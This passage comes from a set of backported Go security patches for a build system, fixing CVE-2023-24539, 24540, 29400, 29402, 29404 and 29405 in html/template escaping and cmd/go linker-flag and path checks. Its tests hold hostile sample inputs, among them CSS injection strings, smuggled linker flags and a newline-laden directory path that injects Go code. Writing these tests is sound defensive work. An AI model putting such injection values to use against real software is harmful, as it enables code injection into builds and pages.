260 "\u00A0\u0100\\u2028\\u2029\ufeff\U0001D11E",
261 },
262diff --git a/src/html/template/jsctx_string.go b/src/html/template/jsctx_string.go
263index dd1d87e..2394893 100644
264--- a/src/html/template/jsctx_string.go
265+++ b/src/html/template/jsctx_string.go
266@@ -4,6 +4,15 @@ package template
267
268 import "strconv"
269
270+func _() {
271+ // An "invalid array index" compiler error signifies that the constant values have changed.
272+ // Re-run the stringer command to generate them again.
273+ var x [1]struct{}
274+ _ = x[jsCtxRegexp-0]
275+ _ = x[jsCtxDivOp-1]
276+ _ = x[jsCtxUnknown-2]
277+}
278+
279 const _jsCtx_name = "jsCtxRegexpjsCtxDivOpjsCtxUnknown"
280
281 var _jsCtx_index = [...]uint8{0, 11, 21, 33}
282diff --git a/src/html/template/state_string.go b/src/html/template/state_string.go
283index 05104be..6fb1a6e 100644
284--- a/src/html/template/state_string.go
285+++ b/src/html/template/state_string.go
286@@ -4,9 +4,42 @@ package template
287
288 import "strconv"
289
290-const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateError"
291+func _() {
292+ // An "invalid array index" compiler error signifies that the constant values have changed.
293+ // Re-run the stringer command to generate them again.
294+ var x [1]struct{}
295+ _ = x[stateText-0]
296+ _ = x[stateTag-1]
297+ _ = x[stateAttrName-2]
298+ _ = x[stateAfterName-3]
299+ _ = x[stateBeforeValue-4]
300+ _ = x[stateHTMLCmt-5]
301+ _ = x[stateRCDATA-6]
302+ _ = x[stateAttr-7]
303+ _ = x[stateURL-8]
304+ _ = x[stateSrcset-9]
305+ _ = x[stateJS-10]
306+ _ = x[stateJSDqStr-11]
307+ _ = x[stateJSSqStr-12]
308+ _ = x[stateJSBqStr-13]
309+ _ = x[stateJSRegexp-14]
310+ _ = x[stateJSBlockCmt-15]
311+ _ = x[stateJSLineCmt-16]
312+ _ = x[stateCSS-17]
313+ _ = x[stateCSSDqStr-18]
314+ _ = x[stateCSSSqStr-19]
315+ _ = x[stateCSSDqURL-20]
316+ _ = x[stateCSSSqURL-21]
317+ _ = x[stateCSSURL-22]
318+ _ = x[stateCSSBlockCmt-23]
319+ _ = x[stateCSSLineCmt-24]
320+ _ = x[stateError-25]
321+ _ = x[stateDead-26]
322+}
323+
324+const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSBqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateErrorstateDead"
325
326-var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 155, 170, 184, 192, 205, 218, 231, 244, 255, 271, 286, 296}
327+var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 154, 167, 182, 196, 204, 217, 230, 243, 256, 267, 283, 298, 308, 317}
328
329 func (i state) String() string {
330 if i >= state(len(_state_index)-1) {
331diff --git a/src/html/template/transition.go b/src/html/template/transition.go
332index 06df679..92eb351 100644
333--- a/src/html/template/transition.go
334+++ b/src/html/template/transition.go
335@@ -27,6 +27,7 @@ var transitionFunc = [...]func(context, []byte) (context, int){
336 stateJS: tJS,
337 stateJSDqStr: tJSDelimited,
338 stateJSSqStr: tJSDelimited,
339+ stateJSBqStr: tJSDelimited,
340 stateJSRegexp: tJSDelimited,
341 stateJSBlockCmt: tBlockCmt,
342 stateJSLineCmt: tLineCmt,
343@@ -262,7 +263,7 @@ func tURL(c context, s []byte) (context, int) {
344
345 // tJS is the context transition function for the JS state.
346 func tJS(c context, s []byte) (context, int) {
347- i := bytes.IndexAny(s, `"'/`)
348+ i := bytes.IndexAny(s, "\"`'/")
349 if i == -1 {
350 // Entire input is non string, comment, regexp tokens.
351 c.jsCtx = nextJSCtx(s, c.jsCtx)
352@@ -274,6 +275,8 @@ func tJS(c context, s []byte) (context, int) {
353 c.state, c.jsCtx = stateJSDqStr, jsCtxRegexp
354 case '\'':
355 c.state, c.jsCtx = stateJSSqStr, jsCtxRegexp
356+ case '`':
357+ c.state, c.jsCtx = stateJSBqStr, jsCtxRegexp
358 case '/':
359 switch {
360 case i+1 < len(s) && s[i+1] == '/':
361@@ -303,6 +306,8 @@ func tJSDelimited(c context, s []byte) (context, int) {
362 switch c.state {
363 case stateJSSqStr:
364 specials = `\'`
365+ case stateJSBqStr:
366+ specials = "`\\"
367 case stateJSRegexp:
368 specials = `\/[]`
369 }
370--
3712.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch
new file mode 100644
index 0000000000..281b6486a8
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch
@@ -0,0 +1,60 @@
1From 8673ca81e5340b87709db2d9749c92a3bf925df1 Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <bracewell@google.com>
3Date: Thu, 13 Apr 2023 15:40:44 -0700
4Subject: [PATCH] html/template: disallow angle brackets in CSS values
5
6Angle brackets should not appear in CSS contexts, as they may affect
7token boundaries (such as closing a <style> tag, resulting in
8injection). Instead emit filterFailsafe, matching the behavior for other
9dangerous characters.
10
11Thanks to Juho Nurminen of Mattermost for reporting this issue.
12
13Fixes #59720
14Fixes CVE-2023-24539
15
16Change-Id: Iccc659c9a18415992b0c05c178792228e3a7bae4
17Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1826636
18Reviewed-by: Julie Qiu <julieqiu@google.com>
19Run-TryBot: Roland Shoemaker <bracewell@google.com>
20Reviewed-by: Damien Neil <dneil@google.com>
21Reviewed-on: https://go-review.googlesource.com/c/go/+/491615
22Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
23Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
24Run-TryBot: Carlos Amedee <carlos@golang.org>
25TryBot-Result: Gopher Robot <gobot@golang.org>
26
27Upstream-Status: Backport from [https://github.com/golang/go/commit/8673ca81e5340b87709db2d9749c92a3bf925df1]
28CVE: CVE-2023-24539
29Signed-off-by: Ashish Sharma <asharma@mvista.com>
30---
31 src/html/template/css.go | 2 +-
32 src/html/template/css_test.go | 2 ++
33 2 files changed, 3 insertions(+), 1 deletion(-)
34
35diff --git a/src/html/template/css.go b/src/html/template/css.go
36index 890a0c6b227fe..f650d8b3e843a 100644
37--- a/src/html/template/css.go
38+++ b/src/html/template/css.go
39@@ -238,7 +238,7 @@ func cssValueFilter(args ...any) string {
40 // inside a string that might embed JavaScript source.
41 for i, c := range b {
42 switch c {
43- case 0, '"', '\'', '(', ')', '/', ';', '@', '[', '\\', ']', '`', '{', '}':
44+ case 0, '"', '\'', '(', ')', '/', ';', '@', '[', '\\', ']', '`', '{', '}', '<', '>':
45 return filterFailsafe
46 case '-':
47 // Disallow <!-- or -->.
48diff --git a/src/html/template/css_test.go b/src/html/template/css_test.go
49index a735638b0314f..2b76256a766e9 100644
50--- a/src/html/template/css_test.go
51+++ b/src/html/template/css_test.go
52@@ -231,6 +231,8 @@ func TestCSSValueFilter(t *testing.T) {
53 {`-exp\000052 ession(alert(1337))`, "ZgotmplZ"},
54 {`-expre\0000073sion`, "-expre\x073sion"},
55 {`@import url evil.css`, "ZgotmplZ"},
56+ {"<", "ZgotmplZ"},
57+ {">", "ZgotmplZ"},
58 }
59 for _, test := range tests {
60 got := cssValueFilter(test.css)
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch
new file mode 100644
index 0000000000..799a0dfcda
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch
@@ -0,0 +1,90 @@
1From ce7bd33345416e6d8cac901792060591cafc2797 Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <bracewell@google.com>
3Date: Tue, 11 Apr 2023 16:27:43 +0100
4Subject: [PATCH] [release-branch.go1.19] html/template: handle all JS
5 whitespace characters
6
7Rather than just a small set. Character class as defined by \s [0].
8
9Thanks to Juho Nurminen of Mattermost for reporting this.
10
11For #59721
12Fixes #59813
13Fixes CVE-2023-24540
14
15[0] https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions/Character_Classes
16
17Change-Id: I56d4fa1ef08125b417106ee7dbfb5b0923b901ba
18Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1821459
19Reviewed-by: Julie Qiu <julieqiu@google.com>
20Run-TryBot: Roland Shoemaker <bracewell@google.com>
21Reviewed-by: Damien Neil <dneil@google.com>
22Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1851497
23Run-TryBot: Damien Neil <dneil@google.com>
24Reviewed-by: Roland Shoemaker <bracewell@google.com>
25Reviewed-on: https://go-review.googlesource.com/c/go/+/491355
26Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
27Reviewed-by: Carlos Amedee <carlos@golang.org>
28TryBot-Bypass: Carlos Amedee <carlos@golang.org>
29Run-TryBot: Carlos Amedee <carlos@golang.org>
30
31Upstream-Status: Backport [https://github.com/golang/go/commit/ce7bd33345416e6d8cac901792060591cafc2797]
32CVE: CVE-2023-24540
33Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
34---
35 src/html/template/js.go | 8 +++++++-
36 src/html/template/js_test.go | 11 +++++++----
37 2 files changed, 14 insertions(+), 5 deletions(-)
38
39diff --git a/src/html/template/js.go b/src/html/template/js.go
40index fe7054efe5cd8..4e05c1455723f 100644
41--- a/src/html/template/js.go
42+++ b/src/html/template/js.go
43@@ -13,6 +13,11 @@ import (
44 "unicode/utf8"
45 )
46
47+// jsWhitespace contains all of the JS whitespace characters, as defined
48+// by the \s character class.
49+// See https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_expressions/Character_classes.
50+const jsWhitespace = "\f\n\r\t\v\u0020\u00a0\u1680\u2000\u2001\u2002\u2003\u2004\u2005\u2006\u2007\u2008\u2009\u200a\u2028\u2029\u202f\u205f\u3000\ufeff"
51+
52 // nextJSCtx returns the context that determines whether a slash after the
53 // given run of tokens starts a regular expression instead of a division
54 // operator: / or /=.
55@@ -26,7 +31,8 @@ import (
56 // JavaScript 2.0 lexical grammar and requires one token of lookbehind:
57 // https://www.mozilla.org/js/language/js20-2000-07/rationale/syntax.html
58 func nextJSCtx(s []byte, preceding jsCtx) jsCtx {
59- s = bytes.TrimRight(s, "\t\n\f\r \u2028\u2029")
60+ // Trim all JS whitespace characters
61+ s = bytes.TrimRight(s, jsWhitespace)
62 if len(s) == 0 {
63 return preceding
64 }
65diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
66index e07c695f7a77d..e52180cc113b5 100644
67--- a/src/html/template/js_test.go
68+++ b/src/html/template/js_test.go
69@@ -81,14 +81,17 @@ func TestNextJsCtx(t *testing.T) {
70 {jsCtxDivOp, "0"},
71 // Dots that are part of a number are div preceders.
72 {jsCtxDivOp, "0."},
73+ // Some JS interpreters treat NBSP as a normal space, so
74+ // we must too in order to properly escape things.
75+ {jsCtxRegexp, "=\u00A0"},
76 }
77
78 for _, test := range tests {
79- if nextJSCtx([]byte(test.s), jsCtxRegexp) != test.jsCtx {
80- t.Errorf("want %s got %q", test.jsCtx, test.s)
81+ if ctx := nextJSCtx([]byte(test.s), jsCtxRegexp); ctx != test.jsCtx {
82+ t.Errorf("%q: want %s got %s", test.s, test.jsCtx, ctx)
83 }
84- if nextJSCtx([]byte(test.s), jsCtxDivOp) != test.jsCtx {
85- t.Errorf("want %s got %q", test.jsCtx, test.s)
86+ if ctx := nextJSCtx([]byte(test.s), jsCtxDivOp); ctx != test.jsCtx {
87+ t.Errorf("%q: want %s got %s", test.s, test.jsCtx, ctx)
88 }
89 }
90
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch
new file mode 100644
index 0000000000..092c7aa0ff
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch
@@ -0,0 +1,94 @@
1From 0d347544cbca0f42b160424f6bc2458ebcc7b3fc Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <bracewell@google.com>
3Date: Thu, 13 Apr 2023 14:01:50 -0700
4Subject: [PATCH] html/template: emit filterFailsafe for empty unquoted attr
5 value
6
7An unquoted action used as an attribute value can result in unsafe
8behavior if it is empty, as HTML normalization will result in unexpected
9attributes, and may allow attribute injection. If executing a template
10results in a empty unquoted attribute value, emit filterFailsafe
11instead.
12
13Thanks to Juho Nurminen of Mattermost for reporting this issue.
14
15Fixes #59722
16Fixes CVE-2023-29400
17
18Change-Id: Ia38d1b536ae2b4af5323a6c6d861e3c057c2570a
19Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1826631
20Reviewed-by: Julie Qiu <julieqiu@google.com>
21Run-TryBot: Roland Shoemaker <bracewell@google.com>
22Reviewed-by: Damien Neil <dneil@google.com>
23Reviewed-on: https://go-review.googlesource.com/c/go/+/491617
24Run-TryBot: Carlos Amedee <carlos@golang.org>
25Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
26Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
27TryBot-Result: Gopher Robot <gobot@golang.org>
28
29Upstream-Status: Backport from [https://github.com/golang/go/commit/0d347544cbca0f42b160424f6bc2458ebcc7b3fc]
30CVE: CVE-2023-29400
31Signed-off-by: Ashish Sharma <asharma@mvista.com>
32---
33 src/html/template/escape.go | 5 ++---
34 src/html/template/escape_test.go | 15 +++++++++++++++
35 src/html/template/html.go | 3 +++
36 3 files changed, 20 insertions(+), 3 deletions(-)
37
38diff --git a/src/html/template/escape.go b/src/html/template/escape.go
39index 4ba1d6b31897e..a62ef159f0dcd 100644
40--- a/src/html/template/escape.go
41+++ b/src/html/template/escape.go
42@@ -382,9 +382,8 @@ func normalizeEscFn(e string) string {
43 // for all x.
44 var redundantFuncs = map[string]map[string]bool{
45 "_html_template_commentescaper": {
46- "_html_template_attrescaper": true,
47- "_html_template_nospaceescaper": true,
48- "_html_template_htmlescaper": true,
49+ "_html_template_attrescaper": true,
50+ "_html_template_htmlescaper": true,
51 },
52 "_html_template_cssescaper": {
53 "_html_template_attrescaper": true,
54diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
55index 3dd212bac9406..f8b2b448f2dfa 100644
56--- a/src/html/template/escape_test.go
57+++ b/src/html/template/escape_test.go
58@@ -678,6 +678,21 @@ func TestEscape(t *testing.T) {
59 `<img srcset={{",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"}}>`,
60 `<img srcset=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,>`,
61 },
62+ {
63+ "unquoted empty attribute value (plaintext)",
64+ "<p name={{.U}}>",
65+ "<p name=ZgotmplZ>",
66+ },
67+ {
68+ "unquoted empty attribute value (url)",
69+ "<p href={{.U}}>",
70+ "<p href=ZgotmplZ>",
71+ },
72+ {
73+ "quoted empty attribute value",
74+ "<p name=\"{{.U}}\">",
75+ "<p name=\"\">",
76+ },
77 }
78
79 for _, test := range tests {
80diff --git a/src/html/template/html.go b/src/html/template/html.go
81index bcca0b51a0ef9..a181699a5bda8 100644
82--- a/src/html/template/html.go
83+++ b/src/html/template/html.go
84@@ -14,6 +14,9 @@ import (
85 // htmlNospaceEscaper escapes for inclusion in unquoted attribute values.
86 func htmlNospaceEscaper(args ...interface{}) string {
87 s, t := stringify(args...)
88+ if s == "" {
89+ return filterFailsafe
90+ }
91 if t == contentTypeHTML {
92 return htmlReplacer(stripTags(s), htmlNospaceNormReplacementTable, false)
93 }
94
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch
new file mode 100644
index 0000000000..01eed9fe1b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch
@@ -0,0 +1,201 @@
1rom c160b49b6d328c86bd76ca2fff9009a71347333f Mon Sep 17 00:00:00 2001
2From: "Bryan C. Mills" <bcmills@google.com>
3Date: Fri, 12 May 2023 14:15:16 -0400
4Subject: [PATCH] [release-branch.go1.19] cmd/go: disallow package directories
5 containing newlines
6
7Directory or file paths containing newlines may cause tools (such as
8cmd/cgo) that emit "//line" or "#line" -directives to write part of
9the path into non-comment lines in generated source code. If those
10lines contain valid Go code, it may be injected into the resulting
11binary.
12
13(Note that Go import paths and file paths within module zip files
14already could not contain newlines.)
15
16Thanks to Juho Nurminen of Mattermost for reporting this issue.
17
18Updates #60167.
19Fixes #60515.
20Fixes CVE-2023-29402.
21
22Change-Id: If55d0400c02beb7a5da5eceac60f1abeac99f064
23Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1882606
24Reviewed-by: Roland Shoemaker <bracewell@google.com>
25Run-TryBot: Roland Shoemaker <bracewell@google.com>
26Reviewed-by: Russ Cox <rsc@google.com>
27Reviewed-by: Damien Neil <dneil@google.com>
28(cherry picked from commit 41f9046495564fc728d6f98384ab7276450ac7e2)
29Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1902229
30Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1904343
31Reviewed-by: Michael Knyszek <mknyszek@google.com>
32Reviewed-by: Bryan Mills <bcmills@google.com>
33Reviewed-on: https://go-review.googlesource.com/c/go/+/501218
34Run-TryBot: David Chase <drchase@google.com>
35Auto-Submit: Michael Knyszek <mknyszek@google.com>
36TryBot-Result: Gopher Robot <gobot@golang.org>
37
38Upstream-Status: Backport [https://github.com/golang/go/commit/c160b49b6d328c86bd76ca2fff9009a71347333f]
39CVE: CVE-2023-29402
40Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
41---
42 src/cmd/go/internal/load/pkg.go | 4 +
43 src/cmd/go/internal/work/exec.go | 6 ++
44 src/cmd/go/script_test.go | 1 +
45 .../go/testdata/script/build_cwd_newline.txt | 100 ++++++++++++++++++
46 4 files changed, 111 insertions(+)
47 create mode 100644 src/cmd/go/testdata/script/build_cwd_newline.txt
48
49diff --git a/src/cmd/go/internal/load/pkg.go b/src/cmd/go/internal/load/pkg.go
50index 369a79b..d2b63b0 100644
51--- a/src/cmd/go/internal/load/pkg.go
52+++ b/src/cmd/go/internal/load/pkg.go
53@@ -1697,6 +1697,10 @@ func (p *Package) load(stk *ImportStack, bp *build.Package, err error) {
54 setError(ImportErrorf(p.ImportPath, "invalid import path %q", p.ImportPath))
55 return
56 }
57+ if strings.ContainsAny(p.Dir, "\r\n") {
58+ setError(fmt.Errorf("invalid package directory %q", p.Dir))
59+ return
60+ }
61
62 // Build list of imported packages and full dependency list.
63 imports := make([]*Package, 0, len(p.Imports))
64diff --git a/src/cmd/go/internal/work/exec.go b/src/cmd/go/internal/work/exec.go
65index 9a9650b..050b785 100644
66--- a/src/cmd/go/internal/work/exec.go
67+++ b/src/cmd/go/internal/work/exec.go
68@@ -458,6 +458,12 @@ func (b *Builder) build(a *Action) (err error) {
69 b.Print(a.Package.ImportPath + "\n")
70 }
71
72+ if p.Error != nil {
73+ // Don't try to build anything for packages with errors. There may be a
74+ // problem with the inputs that makes the package unsafe to build.
75+ return p.Error
76+ }
77+
78 if a.Package.BinaryOnly {
79 p.Stale = true
80 p.StaleReason = "binary-only packages are no longer supported"
81diff --git a/src/cmd/go/script_test.go b/src/cmd/go/script_test.go
82index ec498bb..a1398ad 100644
83--- a/src/cmd/go/script_test.go
84+++ b/src/cmd/go/script_test.go
85@@ -123,6 +123,7 @@ func (ts *testScript) setup() {
86 "devnull=" + os.DevNull,
87 "goversion=" + goVersion(ts),
88 ":=" + string(os.PathListSeparator),
89+ "newline=\n",
90 }
91
92 if runtime.GOOS == "plan9" {
93diff --git a/src/cmd/go/testdata/script/build_cwd_newline.txt b/src/cmd/go/testdata/script/build_cwd_newline.txt
94new file mode 100644
95index 0000000..61c6966
96--- /dev/null
97+++ b/src/cmd/go/testdata/script/build_cwd_newline.txt
98@@ -0,0 +1,100 @@
99+[windows] skip 'filesystem normalizes / to \'
100+[plan9] skip 'filesystem disallows \n in paths'
101+
102+# If the directory path containing a package to be built includes a newline,
103+# the go command should refuse to even try to build the package.
104+
105+env DIR=$WORK${/}${newline}'package main'${newline}'func main() { panic("uh-oh")'${newline}'/*'
106+
107+mkdir $DIR
108+cd $DIR
109+exec pwd
110+cp $WORK/go.mod ./go.mod
111+cp $WORK/main.go ./main.go
112+cp $WORK/main_test.go ./main_test.go
113+
114+! go build -o $devnull .
115+stderr 'package example: invalid package directory .*uh-oh'
116+
117+! go build -o $devnull main.go
118+stderr 'package command-line-arguments: invalid package directory .*uh-oh'
119+
120+! go run .
121+stderr 'package example: invalid package directory .*uh-oh'
122+
123+! go run main.go
124+stderr 'package command-line-arguments: invalid package directory .*uh-oh'
125+
126+! go test .
127+stderr 'package example: invalid package directory .*uh-oh'
128+
129+! go test -v main.go main_test.go
130+stderr 'package command-line-arguments: invalid package directory .*uh-oh'
131+
132+
133+# Since we do preserve $PWD (or set it appropriately) for commands, and we do
134+# not resolve symlinks unnecessarily, referring to the contents of the unsafe
135+# directory via a safe symlink should be ok, and should not inject the data from
136+# the symlink target path.
137+
138+[!symlink] stop 'remainder of test checks symlink behavior'
139+[short] stop 'links and runs binaries'
140+
141+symlink $WORK${/}link -> $DIR
142+
143+go run $WORK${/}link${/}main.go
144+! stdout panic
145+! stderr panic
146+stderr '^ok$'
147+
148+go test -v $WORK${/}link${/}main.go $WORK${/}link${/}main_test.go
149+! stdout panic
150+! stderr panic
151+stdout '^ok$' # 'go test' combines the test's stdout into stderr
152+
153+cd $WORK/link
154+
155+! go run $DIR${/}main.go
156+stderr 'package command-line-arguments: invalid package directory .*uh-oh'
157+
158+go run .
159+! stdout panic
160+! stderr panic
161+stderr '^ok$'
162+
163+go run main.go
164+! stdout panic
165+! stderr panic
166+stderr '^ok$'
167+
168+go test -v
169+! stdout panic
170+! stderr panic
171+stdout '^ok$' # 'go test' combines the test's stdout into stderr
172+
173+go test -v .
174+! stdout panic
175+! stderr panic
176+stdout '^ok$' # 'go test' combines the test's stdout into stderr
177+
178+
179+-- $WORK/go.mod --
180+module example
181+go 1.19
182+-- $WORK/main.go --
183+package main
184+
185+import "C"
186+
187+func main() {
188+ /* nothing here */
189+ println("ok")
190+}
191+-- $WORK/main_test.go --
192+package main
193+
194+import "testing"
195+
196+func TestMain(*testing.M) {
197+ main()
198+}
199--
2002.25.1
201
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch
new file mode 100644
index 0000000000..61336ee9ee
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch
@@ -0,0 +1,84 @@
1From bf3c8ce03e175e870763901a3850bca01381a828 Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <bracewell@google.com>
3Date: Fri, 5 May 2023 13:10:34 -0700
4Subject: [PATCH] [release-branch.go1.19] cmd/go: enforce flags with
5 non-optional arguments
6
7Enforce that linker flags which expect arguments get them, otherwise it
8may be possible to smuggle unexpected flags through as the linker can
9consume what looks like a flag as an argument to a preceding flag (i.e.
10"-Wl,-O -Wl,-R,-bad-flag" is interpreted as "-O=-R -bad-flag"). Also be
11somewhat more restrictive in the general format of some flags.
12
13Thanks to Juho Nurminen of Mattermost for reporting this issue.
14
15Updates #60305
16Fixes #60511
17Fixes CVE-2023-29404
18
19Change-Id: Icdffef2c0f644da50261cace6f43742783931cff
20Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1876275
21Reviewed-by: Ian Lance Taylor <iant@google.com>
22Reviewed-by: Damien Neil <dneil@google.com>
23(cherry picked from commit 896779503cf754cbdac24b61d4cc953b50fe2dde)
24Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1902225
25Run-TryBot: Roland Shoemaker <bracewell@google.com>
26Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1904342
27Reviewed-by: Michael Knyszek <mknyszek@google.com>
28Reviewed-on: https://go-review.googlesource.com/c/go/+/501217
29Auto-Submit: Michael Knyszek <mknyszek@google.com>
30Run-TryBot: David Chase <drchase@google.com>
31TryBot-Bypass: Michael Knyszek <mknyszek@google.com>
32
33Upstream-Status: Backport [https://github.com/golang/go/commit/bf3c8ce03e175e870763901a3850bca01381a828]
34CVE: CVE-2023-29404
35Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
36---
37 src/cmd/go/internal/work/security.go | 6 +++---
38 src/cmd/go/internal/work/security_test.go | 5 +++++
39 2 files changed, 8 insertions(+), 3 deletions(-)
40
41diff --git a/src/cmd/go/internal/work/security.go b/src/cmd/go/internal/work/security.go
42index a823b20..8acb6dc 100644
43--- a/src/cmd/go/internal/work/security.go
44+++ b/src/cmd/go/internal/work/security.go
45@@ -177,17 +177,17 @@ var validLinkerFlags = []*lazyregexp.Regexp{
46 re(`-Wl,-Bdynamic`),
47 re(`-Wl,-berok`),
48 re(`-Wl,-Bstatic`),
49- re(`-WL,-O([^@,\-][^,]*)?`),
50+ re(`-Wl,-O[0-9]+`),
51 re(`-Wl,-d[ny]`),
52 re(`-Wl,--disable-new-dtags`),
53- re(`-Wl,-e[=,][a-zA-Z0-9]*`),
54+ re(`-Wl,-e[=,][a-zA-Z0-9]+`),
55 re(`-Wl,--enable-new-dtags`),
56 re(`-Wl,--end-group`),
57 re(`-Wl,--(no-)?export-dynamic`),
58 re(`-Wl,-framework,[^,@\-][^,]+`),
59 re(`-Wl,-headerpad_max_install_names`),
60 re(`-Wl,--no-undefined`),
61- re(`-Wl,-R([^@\-][^,@]*$)`),
62+ re(`-Wl,-R,?([^@\-,][^,@]*$)`),
63 re(`-Wl,--just-symbols[=,]([^,@\-][^,@]+)`),
64 re(`-Wl,-rpath(-link)?[=,]([^,@\-][^,]+)`),
65 re(`-Wl,-s`),
66diff --git a/src/cmd/go/internal/work/security_test.go b/src/cmd/go/internal/work/security_test.go
67index bd707ff..7b0b7d3 100644
68--- a/src/cmd/go/internal/work/security_test.go
69+++ b/src/cmd/go/internal/work/security_test.go
70@@ -220,6 +220,11 @@ var badLinkerFlags = [][]string{
71 {"-Wl,-R,@foo"},
72 {"-Wl,--just-symbols,@foo"},
73 {"../x.o"},
74+ {"-Wl,-R,"},
75+ {"-Wl,-O"},
76+ {"-Wl,-e="},
77+ {"-Wl,-e,"},
78+ {"-Wl,-R,-flag"},
79 }
80
81 func TestCheckLinkerFlags(t *testing.T) {
82--
832.25.1
84
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch
new file mode 100644
index 0000000000..70d50cc08a
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch
@@ -0,0 +1,112 @@
1From fa60c381ed06c12f9c27a7b50ca44c5f84f7f0f4 Mon Sep 17 00:00:00 2001
2From: Ian Lance Taylor <iant@golang.org>
3Date: Thu, 4 May 2023 14:06:39 -0700
4Subject: [PATCH] [release-branch.go1.20] cmd/go,cmd/cgo: in _cgo_flags use one
5 line per flag
6
7The flags that we recorded in _cgo_flags did not use any quoting,
8so a flag containing embedded spaces was mishandled.
9Change the _cgo_flags format to put each flag on a separate line.
10That is a simple format that does not require any quoting.
11
12As far as I can tell only cmd/go uses _cgo_flags, and it is only
13used for gccgo. If this patch doesn't cause any trouble, then
14in the next release we can change to only using _cgo_flags for gccgo.
15
16Thanks to Juho Nurminen of Mattermost for reporting this issue.
17
18Updates #60306
19Fixes #60514
20Fixes CVE-2023-29405
21
22Change-Id: I36b6e188a44c80d7b9573efa577c386770bd2ba3
23Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1875094
24Reviewed-by: Damien Neil <dneil@google.com>
25Reviewed-by: Roland Shoemaker <bracewell@google.com>
26(cherry picked from commit bcdfcadd5612212089d958bc352a6f6c90742dcc)
27Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1902228
28Run-TryBot: Roland Shoemaker <bracewell@google.com>
29TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
30Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1904345
31Reviewed-by: Michael Knyszek <mknyszek@google.com>
32Reviewed-on: https://go-review.googlesource.com/c/go/+/501220
33TryBot-Result: Gopher Robot <gobot@golang.org>
34Run-TryBot: David Chase <drchase@google.com>
35Auto-Submit: Michael Knyszek <mknyszek@google.com>
36---
37Upstream-Status: Backport [https://github.com/golang/go/commit/fa60c381ed06c12f9c27a7b50ca44c5f84f7f0f4]
38CVE: CVE-2023-29405
39Signed-off-by: Ashish Sharma <asharma@mvista.com>
40
41 src/cmd/cgo/out.go | 4 +++-
42 src/cmd/go/internal/work/gccgo.go | 14 ++++++-------
43 .../go/testdata/script/gccgo_link_ldflags.txt | 20 +++++++++++++++++++
44 3 files changed, 29 insertions(+), 9 deletions(-)
45 create mode 100644 src/cmd/go/testdata/script/gccgo_link_ldflags.txt
46
47diff --git a/src/cmd/cgo/out.go b/src/cmd/cgo/out.go
